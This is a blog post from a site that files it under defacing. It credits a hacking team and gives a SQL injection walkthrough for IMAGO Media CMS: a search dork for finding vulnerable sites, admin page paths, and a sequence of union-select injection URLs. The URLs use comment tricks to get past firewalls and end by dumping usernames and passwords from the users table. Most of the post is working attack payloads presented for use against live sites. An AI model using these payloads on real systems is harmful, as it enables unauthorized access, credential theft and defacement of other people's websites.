Header Ads

Home > Defacing > Injection > IMAGO Media CMS SQL Injection

IMAGO Media CMS SQL Injection

Monday, January 16, 2017 ,
    
+ IMAGO MEDIA CMS SQL INJECTION +
-------------------------------------------

// Author : Zbyte
// Team : K33P-S1L3NT
// Notif : Ternate Lab Pentesting
// page : https://www.facebook.com/loading.gov
// channel : https://www.youtube.com/channel/UChFMZ01R8Z1mhh2tWc-BddQ
// Grets : QueenAisyah | geek_Defcon | kazutto_kun | s1puT | Badaki | 1!0N7!N | i.am_geek | Admiral | Kopral
// CMS : http://imagomedia.co.id/
// DORK : inurl:/hal-visi-misi ext:html
// Admin page : site.com/user/index.php or site.com/admin/

// Special : Overload Team | Cyber Team Cirebon | Mr.Trouble5hooting
// Demo : http://imagomedia.co.id/notif.php


Follow for Proof of Concept Description Bypass WAF
( https://ghostbin.com/paste/tx2rg )


Proof of Concept
--------------------

site.com/hal-visi-misi.html <= default

site.com/hal-visi-misi'.html

site.com/hal-visi-misi' order by 10+--+.html

site.com/hal-visi-misi' union+select+1,2,3,4,5,6,7,8,9,10+--+.html

site.com/hal-visi-misi' /*!union*/+/*!select*/+1,2,3,4,5,6,7,8,9,10+--+.html

site.com/hal-visi-misi' /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,9,10+--+.html

site.com/hal-visi-misi' and false /*!12345union*/+/*12345select*/+1,2,3,4,5,6,7,8,9,10+--+.html

site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,9,10+--+.html <=

site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,version(),10+--+.html

site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,database(),10+--+.html

site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,group_concat(/*!table_name*/),10+from+information_schema./*!tables*/ where /*!table_schema*/=database()+--+.html

site.com/hal-visi-misi' union+select+1,2,3,4,5,6,7,8,group_concat(/*!column_name*/),10+from information_schema./*!columns*/ where /*!table_name*/=0x7461626c656d616e6573+--+.html

site.com/hal-visi-misi' union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,pswd,0x3a,status),10+from+tablemanes+--+.html


Sumber @ Ternate Lab Pantesting

Post a Comment

1 comment:

Silahkan Komentar dengan bahasa yang sopan

Subscribe to: Post Comments ( Atom )
Powered by Blogger.